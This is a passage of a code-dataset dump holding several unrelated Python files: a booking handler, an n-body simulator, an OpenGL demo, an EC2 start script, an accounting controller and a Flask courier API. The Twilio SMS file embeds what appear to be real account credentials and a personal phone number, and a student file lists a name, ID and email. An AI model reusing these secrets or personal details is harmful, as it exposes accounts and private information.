\"\"\"Booking handler\"\"\"\n\n def __init__(self):\n \"\"\"Initializing\"\"\"\n self.matches = []\n self.teams = []\n self.calendar = Calendar(datetime.now().year)\n\n def _read_int(self, prompt, minval=None, maxval=None):\n \"\"\"Read an integer value from keyboard\"\"\"\n while True:\n try:\n val = int(input(prompt))\n if minval is not None and val < minval:\n print('*** The minimum allowed value is %d' % minval)\n elif maxval is not None and val > maxval:\n print('*** The maximum allowed value is %d' % maxval)\n else:\n return val\n except ValueError:\n print('*** Please enter an integer')\n\n def _book_day(self, day, match):\n \"\"\"Book a match on a specific day\"\"\"\n day.book(match)\n self.matches.append(match)\n\n def create_match(self):\n \"\"\"Create a new match\"\"\"\n if len(self.teams) < 2:\n print('At least two registered teams required to book a match')\n return\n num_months = len(self.calendar.months)\n month = self.calendar.get_month(self._read_int('Choose month (1–%d): ' % num_months, 1, num_months))\n num_days = month.get_length()\n day = month.get_day(self._read_int('Choose day (1–%d): ' % num_days, 1, num_days))\n if day.is_booked():\n print('')\n print('That day is already booked for the following match:')\n print(day.match)\n return\n print('')\n self.list_teams()\n print('')\n num_teams = len(self.teams)\n team1 = self._read_int('Choose first team: ', 1, num_teams)\n while True:\n team2 = self._read_int('Choose second team: ', 1, num_teams)\n if team1 != team2:\n break\n print('*** Please choose a different team')\n\n sport = input('Choose sport: ').strip()\n match = Match(sport, (self.teams[team1 - 1], self.teams[team2 - 1]))\n self._book_day(day, match)\n print('')\n print('Match booked on %d %s:' % (day.number, month.name))\n print(match)\n\n def create_team(self):\n \"\"\"Create a new team\"\"\"\n print('')\n self.list_teams()\n print('')\n name = input('Team name (blank to cancel): ').strip()\n if not name:\n return\n self.teams.append(Team(name))\n print(\"Team '%s' created\" % name)\n\n def list_calendar(self):\n \"\"\"Output the calendar\"\"\"\n print('=== %d ===' % self.calendar.year)\n num_months = len(self.calendar.months)\n for i in range(1, num_months + 1):\n print('%s) %s' % (i, self.calendar.get_month(i)))\n\n print('')\n num = self._read_int('Choose month (0 to cancel): ', 0, num_months)\n if not num:\n return\n print('')\n month = self.calendar.get_month(num)\n print('=== %s %d ===' % (month.name, self.calendar.year))\n for d in range(1, month.get_length() + 1):\n print(month.get_day(d))\n\n def list_matches(self):\n \"\"\"Output all currently booked matches\"\"\"\n if not self.matches:\n print('=== No matches ===')\n return\n print('=== Booked matches ===')\n for m in range(1, len(self.calendar.months) + 1):\n month = self.calendar.get_month(m)\n for d in range(1, month.get_length() + 1):\n day = month.get_day(d)\n if day.is_booked():\n print('')\n print('%d %s:' % (day.number, month.name))\n print(day.match)\n continue\n\n def list_teams(self):\n \"\"\"Output all registered teams\"\"\"\n if not self.teams:\n print('=== No teams ===')\n return\n print('=== Teams ===')\n for i, team in enumerate(self.teams):\n print('%d) %s' % (i + 1, team))\n","sub_path":"iloot/me/kmom06/booking/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"276091184","text":"\"\"\"\n------------------------------------------------------\nDays, 
hours, seconds library\n-------------------------------------------------------\nAuthor: Minesh Varu\nID: 110814300\nEmail: varu4300@mylaurier.ca\nVersion: May 23, 2012\n-------------------------------------------------------\n\"\"\"\nseconds = 60\nhours_in_day = 24\n\"\"\"\n-------------------------------------------------------\nDays, hours, seconds Function\n-------------------------------------------------------\nPreconditions:\n total_seconds: total seconds entered (int > 0)\nPostconditions:\n returns:\n minutes: The amount of minutes from total seconds (int)\n hours: The amount of hours from total seconds (int)\n days: the amount of days from total seconds (int)\n-------------------------------------------------------\n\"\"\"\ndef time_values(total_seconds):\n minutes = int(total_seconds / seconds)\n hours = int(minutes / seconds)\n days = int(hours / hours_in_day)\n return minutes, hours, days\n","sub_path":"CP104/Assignements/varu4300_a3/src/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"540752324","text":"import numpy as np\n#import cupy as np\nimport math\nfrom timeit import default_timer as timer\n\n#TODO: general speed optimization\n\n#the gravitational constant\nG = 6.673e-11\n#delta t\n#TODO: speed up calc, up this factor and only display every x frames to decrease error\n#t = 5e-6 \nt = 100\n\n#calculates the next location of the objects for each frame\n#equation used is verlet velocity scheme\ndef calc_position(objs):\t\n\tobjs[\"loc\"] = objs[\"loc\"] + objs[\"vel\"] * t + 0.5 * objs[\"accel\"] * t**2\n\tobjs[\"loc\"] = objs[\"loc\"].clip(0, 1e9)\n\ta_t = objs[\"accel\"]\n\tobjs[\"accel\"] = calc_accel_linear(objs[\"loc\"], objs[\"mass\"])\n\t#objs[\"accel\"] = calc_accel(objs[\"loc\"], objs[\"mass\"])\n\n\tobjs[\"vel\"] = objs[\"vel\"] + 0.5 * (a_t + objs[\"accel\"]) * t\n\n\treturn objs\n\n#gets delta between simple accel and linear accel functions\ndef get_delta(objs_loc, objs_m):\n\treturn calc_accel(objs_loc, objs_m) - calc_accel_linear(objs_loc, objs_m)\n\n#calcs acceleration in the x and y directions\n#this is a test func for the 2-body problem\ndef calc_accel(objs_loc, objs_m):\n\t#start = timer()\n\n\tx_1 = objs_loc[0, 0]\n\ty_1 = objs_loc[0, 1]\n\tx_2 = objs_loc[1, 0]\n\ty_2 = objs_loc[1, 1]\n\n\tm_1 = objs_m[0]\n\tm_2 = objs_m[1]\n\n\t#delta x\n\td_x = x_1 - x_2\n\n\n\t#print(d_x)\n\n\t#delta y\n\td_y = y_1 - y_2\n\n\t#print(d_y)\n\n\t#|r|^3\n\tr_3 = math.sqrt(d_x**2 + d_y**2)**3\n\n\t#print(r_3)\n\n\tif (r_3 == 0):\n\t\treturn np.asarray([\n\t\t\t\t[0, 0],\n\t\t\t\t[0, 0]\n\t\t\t])\n\n\t#begin full calcs\n\n\tx1_a = (G * m_2 * d_x * -1) / r_3\n\ty1_a = (G * m_2 * d_y * -1) / r_3\n\n\tx2_a = (G * m_1 * d_x) / r_3\n\ty2_a = (G * m_1 * d_y) / r_3\n\n\t#end = timer()\n\n\t#print(\"simple elapsed time:\", end - start)\n\n\treturn np.asarray([ \n\t\t[x1_a, y1_a],\n\t\t[x2_a, y2_a]\n\t])\n\n#calcs acceleration in the x and y directions\n#uses fancy linear algebra magic\n#TODO: see if x/y parts can't be done at once\ndef calc_accel_linear(objs_loc, objs_m):\n\t#start = timer()\n\n\t#vector of x, y coords\n\tx_v = objs_loc[:,0]\n\ty_v = objs_loc[:,1]\n\n\t#number of objs\n\tn = x_v.size\n\n\t#stack those vectors\n\t#stacks downwards\n\tx_m = np.tile(x_v, (n, 1))\n\ty_m = np.tile(y_v, (n, 1))\n\n\t#subtract from the transpose to get the deltas\n\td_x = x_m - x_m.T\n\td_y = y_m - y_m.T\n\n\t#distance cubed\n\tr_3 = 
np.power(np.sqrt(np.power(d_x, 2) + np.power(d_y, 2)), 3)\n\n\tm_m = np.tile(objs_m, (n, 1))\n\n\tz_x = (m_m * d_x).T\n\tz_y = (m_m * d_y).T\n\n\ta_x = np.sum(np.nan_to_num((G * z_x) / r_3), 0)\n\ta_y = np.sum(np.nan_to_num((G * z_y) / r_3), 0)\n\n\ta = np.stack((a_x, a_y), axis=-1)\n\n\t#end = timer()\n\n\t#print(\"numpy elapsed time:\", end - start)\n\n\treturn a","sub_path":"position_calculator.py","file_name":"position_calculator.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78042185","text":"''' Scatters a bunch of blocks around a scene, to demonstrate the\ntranslate-rotate-scale affine transformations.\n\nWritten by Scott D. Anderson\nscott.anderson@acm.org\nFall 2003\n\nAdapted to use Python, Fall 2009\n'''\n\nimport sys\n\nfrom TW import *\n\n### ================================================================\n\n### This program sometimes draws a block \"by hand,\" instead of using\n### the GLUT object. The following array holds the 8 vertices. Unlike\n### the GLUT object, which has the origin in the center, this block\n### has the origin at one corner. This makes scaling a little easier\n### sometimes. \n\nvertices = (\n (0,0,0),(1,0,0),(1,1,0),(0,1,0),\n (0,0,1),(1,0,1),(1,1,1),(0,1,1)\n)\n\n\ndef face(a, b, c, d):\n \"\"\"This function draws one face of the wire cube given the indices\nof the four vertices. Since it is wire, it doesn't matter whether the\nvertices are counter-clockwise, but we'll try to do that anyhow.\"\"\"\n glBegin(GL_LINE_LOOP)\n glVertex3fv(vertices[a])\n glVertex3fv(vertices[b])\n glVertex3fv(vertices[c])\n glVertex3fv(vertices[d])\n glEnd()\n\ndef myCube():\n '''draws a unit cube where the reference point is the lower left\n front corner (like the barn), rather than the center.'''\n # This is a little inefficient, since every edge gets drawn twice,\n # since each edge is the boundary between two faces. However, this\n # organizes the code, generalizes to solid objects, and introduces\n # the idea of the inside and outside faces of a surface.\n face(0,1,2,3) # front\n face(7,6,5,4) # back\n face(4,5,1,0) # bottom\n face(1,5,6,2) # right\n face(0,3,7,4) # left\n face(2,6,7,3) # top\n\n\ndef display():\n '''An ordinary display function, drawing a succession of blocks.\nEach has a different color, so that you can match up the graphic block\nwith the code that draws it. For each block, try to figure out where\nit is and how it looks, just by visualizing the transformations.\nThat's good practice for using the affine transformations in your own\nmodeling.'''\n\n twDisplayInit()\n twCamera()\n\n # draw ground\n twColorName(TW_BLACK)\n twGround()\n\n # origin\n twColorName(TW_WHITE)\n glutWireCube(1)\n\n # translate only\n twColorName(TW_RED)\n glPushMatrix()\n glTranslatef(2,3,4)\n glutWireCube(1)\n glPopMatrix()\n\n # translate and scale. 
Look out below!\n twColorName(TW_GREEN)\n glPushMatrix()\n glTranslatef(4,0,5)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # compensating in the translation\n twColorName(TW_BLUE)\n glPushMatrix()\n glTranslatef(8,1,1)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # using a different reference point\n twColorName(TW_MAGENTA)\n glPushMatrix()\n glTranslatef(9,0,1)\n glScalef(2,2,2)\n myCube()\n glPopMatrix()\n\n # stacking some rotated blocks\n twColorName(TW_YELLOW)\n glPushMatrix()\n glTranslatef(1,1,8)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n twColorName(TW_ORANGE)\n glPushMatrix()\n glTranslatef(1,3,8)\n glRotatef(30,0,1,0) # 30 degrees around y\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n twColorName(TW_BROWN)\n glPushMatrix()\n glTranslatef(1,5,8)\n glRotatef(60,0,1,0) # degrees around y\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # non-uniform scaling\n twColorName(TW_CYAN)\n glPushMatrix()\n glTranslatef(8,0,8)\n glRotatef(45,0,1,0) # degrees around y\n glScalef(1,5,1)\n glutWireCube(1)\n glPopMatrix()\n \n twColorName(TW_TEAL)\n glPushMatrix()\n glTranslatef(9,0,9)\n glRotatef(45,0,1,0) # degrees around y\n glScalef(1,5,1)\n myCube()\n glPopMatrix()\n\n glFlush()\n glutSwapBuffers()\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode( GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n twBoundingBox(0,10,0,5,0,10)\n twInitWindowSize(500,500)\n glutCreateWindow(sys.argv[0])\n glutDisplayFunc(display)\n # nice fat lines. In this program, we only need to say this once\n glLineWidth(3) \n ## twSetMessages(TW_ALL_MESSAGES)\n twMainInit()\n glutMainLoop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pytw/demos/modeling/Blocks.py","file_name":"Blocks.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551285063","text":"\"\"\"\n 使用Twilio官网提供的免费的信息服务,每个月15美元的额度\n 使用前请安装twilio:pip install twilio\n 每条短信0.028美元,每个月可以发500多条短信,所以尽量只在需要的时候调用该接口发送短信。\n\"\"\"\nfrom twilio.rest import Client\n\n\ndef send(msg='No Content.', to=\"+8618813092702\"):\n \"\"\"\n 发送短信\n :param msg: 短信内容\n :param to: 接收号码\n :return:\n \"\"\"\n account_sid = 'AC6211336838c38a445b7c5c7b237b4510'\n auth_token = 'ab0b9ab3911d4f87a2d26628ead3d6ca'\n from_number = '+19786366084'\n\n client = Client(account_sid, auth_token)\n try:\n client.messages.create(to=to, from_=from_number, body=msg)\n # print('短信已经发送:\\nfrom:\\t{}\\nto:\\t{}\\ncontent:\\t\\t{}\\n'.format(from_number,to.split('+86')[1],msg))\n except Exception as e:\n # print('短信发送失败,账号欠费或者未被验证!')\n return e","sub_path":"sendSMS.py","file_name":"sendSMS.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"24003289","text":"import boto3\nfrom botocore.exceptions import ClientError\n\n\nInstanceID = \"i-060109211f50178a6\"\n\nec2 = boto3.client('ec2', region_name='us-west-1')\n\ntry:\n ec2.start_instances(InstanceIds=[InstanceID], DryRun=True)\nexcept ClientError as e:\n if 'DryRunOperation' not in str(e):\n print(\"You don't have permission to reboot instances.\")\n raise\n\ntry:\n response = ec2.start_instances(InstanceIds=[InstanceID], DryRun=False)\n print('Success', response)\nexcept ClientError as e:\n print('Error', e)","sub_path":"start_ec2.py","file_name":"start_ec2.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"45809493","text":"\"\"\"\n This file is part of GNUKhata:A modular,robust and Free Accounting System.\n\n GNUKhata is Free Software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as\n published by the Free Software Foundation; either version 3 of\n the License, or (at your option) any later version.\n\n GNUKhata is distributed in the hope that it will be useful, but\n WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public\n License along with GNUKhata (COPYING); if not, write to the\n Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\n Boston, MA 02110-1301 USA59 Temple Place, Suite 330,\n\t\tcontributors: anusha kadambala\n\n\"\"\"\n\nimport logging\n\nfrom pylons import request, response, session, tmpl_context as c\nfrom pylons.controllers.util import abort, redirect\nfrom pylons.decorators import jsonify\nfrom pylons import app_globals\nfrom datetime import datetime\nfrom gnukhata.lib.base import BaseController, render\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table,PageBreak,Spacer\nfrom reportlab.lib import colors\nimport datetime,time\nfrom time import strftime\n\nlog = logging.getLogger(__name__)\n\nclass PaymentController(BaseController):\n\n\tdef index(self):\n\t\tc.flag = \"n\"\n\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\tpaymentacc = []\n\t\t#populate existing account list\n\t\tfor db in payment:\n\t\t\tpaymentacc.append(db[0])\n\t\tc.bank = paymentacc\n\t\t# get current voucher code\n\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\tif res == False:\n\t\t\tc.vouchercode = 1\n\t\telse:\n\t\t\tc.vouchercode = res\n\t\t# get current date \n\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\tc.displayStatus = False\t\t\t\n\t\treturn render('/payment voucher.mako')\t\n\t\n\tdef setVoucher(self):\n\t\t\n\t\tc.flag = request.params[\"flag\"]\n\t\t# Add payment Voucher.\n\t\tif c.flag == \"n\":\n\t\t\tc.payment = self.getAllAccounts()\n\t\t\tself.vouchertype = \"payment\"\n\t\t\t# get current date\n\t\t\tself.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tself.queryParams_master=[str(request.params[\"vouchercode\"]),self.date,request.params[\"date\"],request.params[\"narration\"]]\n\t\t\t#self.lastrow = request.params[\"rowCount\"]\n\t\t\tself.queryParams_details = []\n\t\t\tfor i in range(0,len(request.params.getall('cr_dr'))):\n\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'cr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"credit_amount\")[i]]\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'dr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"debit_amount\")[i]]\n\t\t\t\tself.queryParams_details.append(queryParams_details)\n\t\t\t\t\n\t\t\tself.queryParams=[request.params[\"vouchercode\"],self.vouchertype]\n\t\t\t\n\t\t\ttrial = app_globals.server_proxy.cashbook.setCashBook(self.queryParams_master,self.queryParams_details,session[\"gnukhata\"])\n\t\t\tres = 
app_globals.server_proxy.voucher.setVoucher(self.queryParams,session[\"gnukhata\"])\n\t\t\tif res == True:\n\t\t\t\tfor r in self.queryParams_details:\n\t\t\t\t\tif r[1] == 'cr':\n\t\t\t\t\t\tapp_globals.server_proxy.account.updateAccountBalance([r[2],r[3],'craccount'],session[\"gnukhata\"])\n\t\t\t\t\telse:\n\t\t\t\t\t\tapp_globals.server_proxy.account.updateAccountBalance([r[2],r[3],'draccount'],session[\"gnukhata\"])\t\n\t\t\tc.flag = \"n\"\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\t\tpaymentacc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\t\tif res == False:\n\t\t\t\tc.vouchercode = 1\n\t\t\telse:\n\t\t\t\tc.vouchercode = res\n\t\t\t# get current date \n\t\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tc.displayStatus = False\t\t\n\t\t\tresponse.headerlist = [['Content-type','text-html']]\n\t\t\tresponse.charset='utf8'\n\n\t\tif c.flag == \"e\":\n\t\t\tc.payment = self.getAllAccounts()\n\t\t\t# get current date\n\t\t\tself.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tself.queryParams_master=[str(request.params[\"vouchercode\"]),self.date,datetime.datetime.strptime(request.params[\"date\"], \"%d-%m-%Y\").strftime('%Y-%m-%d'),request.params[\"narration\"]]\n\t\t\tself.queryParams_details = []\n\t\t\tfor i in range(0,len(request.params.getall('cr_dr'))):\n\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'cr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"credit_amount\")[i]]\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'dr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"debit_amount\")[i]]\n\t\t\t\tself.queryParams_details.append(queryParams_details)\n\t\t\t\n\t\t\t\n\t\t\ttrial = app_globals.server_proxy.cashbook.editVoucher(self.queryParams_master,self.queryParams_details,session[\"gnukhata\"])\n\t\t\tc.flag = \"n\"\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccounts(session[\"gnukhata\"])\n\t\t\tpaymentacc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\t\tif res == False:\n\t\t\t\tc.vouchercode = 1\n\t\t\telse:\n\t\t\t\tc.vouchercode = res\n\t\t\t# get current date \n\t\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tc.displayStatus = False\t\t\n\t\t\tresponse.headerlist = [['Content-type','text-html']]\n\t\t\tresponse.charset='utf8' \n\t\treturn render('/payment voucher.mako')\n\t\n\tdef getVoucher(self):\n\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t#print res\n\t\tif res == False:\n\t\t\treturn False\n\t\tif str(request.params[\"submit\"]) == 'Edit':\n\t\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t\tc.result=res\t\n\t\t\tc.flag = 'e'\n\t\t\tpayment = app_globals.server_proxy.account.getAllAccounts(session[\"gnukhata\"])\n\t\t\tpaymentacc = []\n\t\t\t#populate existing account list\n\t\t\tfor db in
payment:\n\t\t\t\tpaymentacc.append(db[0])\n\t\t\tc.bank = paymentacc\n\t\t\tc.vouchercode = res[0][0]\n\t\t\tc.rowCount=len(res)\n\t\t\treturn render('/payment voucher.mako')\n\n\t\tif str(request.params[\"submit\"]) == 'Open':\n\t\t\tres = app_globals.server_proxy.cashbook.getVoucher([str(request.params[\"search_value\"])],session[\"gnukhata\"])\n\t\t\t\t\n\t\t\tresponse.headers[\"Content-Type\"] = \"application/pdf\"\n\t\t\tresponse.headers[\"Content-disposition\"] = \"attachment; filename=paymentreport.pdf\"\n\t\t\tdoc = SimpleDocTemplate(response)\n\t\t\tstyles = getSampleStyleSheet() \n\t\t\tstyleN = styles['Normal'] \n\t\t\tstyleH = styles['Heading1']\n\t\t\tstyleT = styles['Title']\n\t\t\tps=[] \n\t\t\tps.append(Paragraph(\"Adreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"Addreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"Addreess,Addreess,Addreess\",styleN))\n\t\t\tps.append(Paragraph(\"T:022-28908312\",styleN))\n\t\t\tps.append(Paragraph(\"M:09869049492\",styleN))\n\t\t\tps.append(Paragraph(\"email@email.com\",styleN))\n\t\t\tps.append(Paragraph(\"www.url.com\",styleN))\n\t\t\ts = Spacer(1,0.25*20)\n\t\t\tps.append(s)\n\t\t\t\n\t\t\t\n\t\t\tps.append(Paragraph(\" Payment Voucher\",styleT))\n\t\t\tps.append(Paragraph(\" ------------------\",styleH))\n\t\t\tps.append(Paragraph(\"\",styleN))\n\t\t\tps.append(Paragraph(\"Voucher Code :\"+str(request.params[\"search_value\"])+\"\",styleN)) \n\t\t\tself.voucher_date = time.strftime(\"%d-%m-%Y\",time.strptime(str(res[0][1]),\"%d-%m-%Y\"))\n\t\t\tps.append(Paragraph(\"Date:\"+str(self.voucher_date)+\"\",styleN)) \n\t\t\tdata1 = [['','Account name','Debit Amount','Credit Amount']]\n\t\t\tdata = data1 \n\t\t\tfor r in res:\n\t\t\t\tres1=app_globals.server_proxy.groups.getGroupNameByAccountName([r[3]],session[\"gnukhata\"])\n\t\t\t\tif r[4] == 'cr':\n\t\t\t\t\tdata2 = ['cr',str(res1[0])+'-->'+str(r[3]),'',r[5]]\n\t\t\t\tif r[4] == 'dr':\n\t\t\t\t\tdata2 = ['dr',str(res1[0])+'-->'+str(r[3]),r[5],'']\n\t\t\t\tdata.append(data2)\n\t\t\t\n\t\t\t\n\t\t\tts = [ ('FONT', (0,0), (-1,0), 'Times-Bold'), \n\t\t\t ('INNERGRID', (0,0), (-1,-1),0.25, colors.black), \n\t\t\t ('BOX', (0,0), (-1,-1),0.25, colors.black)] \n\n\t\t\n\t\t\ttable = Table(data, style=ts) \n\t\t\tps.append(table) \n\t\t\t\n\t\t\t\n\t\t\tdoc.build(ps) \n\t\t\treturn\n\t\n\t\n\tdef getCashBook(self):\n\t\tvouchercode = request.params[\"vouchercode\"]\n\t\tres = app_globals.server_proxy.cashbook.getCashBook([str(vouchercode)],session[\"gnukhata\"])\n\t\treturn res\n\t\n\t@jsonify\n\tdef getAllAccounts(self):\n\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\tpaymentacc = []\n\t\t#populate existing account list\n\t\tfor db in payment:\n\t\t\tpaymentacc.append(db[0])\n\t\treturn {\"paymentacc\":paymentacc}\n\t\t\n\tdef getAllBankAccount(self):\n\t\tbank = app_globals.server_proxy.account.getAllAccountBank(session[\"gnukhata\"])\n\t\tbankname = []\n\t\t# populate existing bankname list\n\t\tfor db in bank:\n\t\t\tbankname.append(db[0])\n\t\treturn bankname\n","sub_path":"webapp/gnukhata/controllers/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":9396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"344188465","text":"import datetime\nimport re\nfrom pprint import pprint\n\nimport pydantic\nfrom flask import jsonify, abort, request, Blueprint\nfrom data import db_session\nfrom data.couriers import Courier\nfrom data.orders 
import Order\nfrom data.regions import Region\nfrom data.workinghours import WH\nfrom data.deliveryhours import DH\nfrom typing import List, Optional\nimport json\nfrom pydantic import validator\n\nblueprint = Blueprint(\n    'shop_api',\n    __name__,\n    template_folder='templates'\n)\ncourier_fields = {'courier_id', 'courier_type', 'regions', 'working_hours'}\norder_fields = {'order_id', 'weight', 'region', 'delivery_hours'}\nc_type = {'foot': 10, 'bike': 15, 'car': 50}\nrev_c_type = {10: 'foot', 15: 'bike', 50: 'car'}\nkd = {10: 2, 15: 5, 50: 9}\nCODE = 'zhern0206eskiy'\nPATTERN = re.compile('.{2}:.{2}-.{2}:.{2}')\n\n\nclass CourierModel(pydantic.BaseModel):\n    base: List[int]\n    courier_id: int\n    courier_type: str\n    regions: List[int]\n    working_hours: List[str]\n\n    @validator('courier_type')\n    def courier_type_should_be(cls, courier_type: str):\n        if courier_type not in c_type:\n            raise ValueError('courier_type should be \"foot\", \"car\" or \"bike\"')\n        return courier_type\n\n    @validator('working_hours')\n    def wh_should_be(cls, working_hours: list):\n        for wh in working_hours:\n            if not PATTERN.match(wh):\n                raise ValueError('invalid working hours format')\n            if wh[2] != ':' or wh[5] != '-' or wh[8] != ':':\n                raise ValueError('invalid separators')\n            if not all(map(lambda x: x.isnumeric(), [wh[0], wh[1], wh[3], wh[4], wh[6], wh[7], wh[9], wh[10]])):\n                raise ValueError('Hours/minutes should be integer')\n            else:\n                f1 = not 0 <= int(wh[0:2]) <= 23\n                f2 = not 0 <= int(wh[3:5]) <= 59\n                f3 = not 0 <= int(wh[6:8]) <= 23\n                f4 = not 0 <= int(wh[9:11]) <= 59\n                if f1 or f3:\n                    raise ValueError('Hours should be between 0 and 23')\n                if f2 or f4:\n                    raise ValueError('Minutes should be between 0 and 59')\n        return working_hours\n\n    class Config:\n        extra = 'forbid'\n\n\nclass EditCourierModel(pydantic.BaseModel):\n    courier_id: Optional[int]\n    courier_type: Optional[str]\n    regions: Optional[List[int]]\n    working_hours: Optional[List[str]]\n\n    @validator('courier_type')\n    def courier_type_should_be(cls, courier_type: str):\n        if courier_type not in c_type:\n            raise ValueError('courier_type should be \"foot\", \"car\" or \"bike\"')\n        return courier_type\n\n    @validator('working_hours')\n    def wh_should_be(cls, working_hours: list):\n        for wh in working_hours:\n            if not PATTERN.match(wh):\n                raise ValueError('invalid working hours format')\n            if wh[2] != ':' or wh[5] != '-' or wh[8] != ':':\n                raise ValueError('invalid separators')\n            if not all(map(lambda x: x.isnumeric(), [wh[0], wh[1], wh[3], wh[4], wh[6], wh[7], wh[9], wh[10]])):\n                raise ValueError('Hours/minutes should be integer')\n            else:\n                f1 = not 0 <= int(wh[0:2]) <= 23\n                f2 = not 0 <= int(wh[3:5]) <= 59\n                f3 = not 0 <= int(wh[6:8]) <= 23\n                f4 = not 0 <= int(wh[9:11]) <= 59\n                if f1 or f3:\n                    raise ValueError('Hours should be between 0 and 23')\n                if f2 or f4:\n                    raise ValueError('Minutes should be between 0 and 59')\n        return working_hours\n\n    class Config:\n        extra = 'forbid'\n\n\nclass OrderModel(pydantic.BaseModel):\n    base: List[int]\n    order_id: int\n    weight: float\n    region: int\n    delivery_hours: List[str]\n\n    class Config:\n        extra = 'forbid'\n\n    @validator('weight')\n    def weight_should_be(cls, w: float):\n        if not 0.01 <= w <= 50:\n            raise ValueError('weight should be between 0.01 and 50')\n        return w\n\n    @validator('delivery_hours')\n    def dh_should_be(cls, delivery_hours: list):\n        for dh in delivery_hours:\n            if not PATTERN.match(dh):\n                raise ValueError('invalid working hours format')\n            try:\n                list(map(int, [dh[0], dh[1], dh[3], dh[4], dh[6], dh[7], dh[9], dh[10]]))\n            except
ValueError:\n raise ValueError('Hours/minutes should be integer')\n if dh[2] != ':' or dh[5] != '-' or dh[8] != ':':\n raise ValueError('invalid separators')\n f1 = not 0 <= int(dh[0:2]) <= 23\n f2 = not 0 <= int(dh[3:5]) <= 59\n f3 = not 0 <= int(dh[6:8]) <= 23\n f4 = not 0 <= int(dh[9:11]) <= 59\n if f1 or f3:\n raise ValueError('Hours should be between 0 and 23')\n if f2 or f4:\n raise ValueError('Minutes should be between 0 and 59')\n return delivery_hours\n\n\ndef is_t_ok(l1, l2) -> bool:\n # format HH:MM - HH:MM\n time = [0] * 1440\n # print(list(l1) + list(l2))\n for h in list(l1) + list(l2):\n t = h.hours\n b1, b2 = t.split('-')\n a = b1.split(':')\n a = int(a[0]) * 60 + int(a[1])\n b = b2.split(':')\n b = int(b[0]) * 60 + int(b[1])\n time[a] += 1\n time[b + 1] -= 1\n # print(t, b1, b2, a, b, time[a], time[b + 1])\n # print('---------------------------')\n balance = 0\n for i in time:\n balance += i\n if balance >= 2:\n return True\n return False\n\n\ndef choose_orders(ords: list, maxw: int) -> list:\n try:\n n, w = len(ords), maxw * 100\n a = 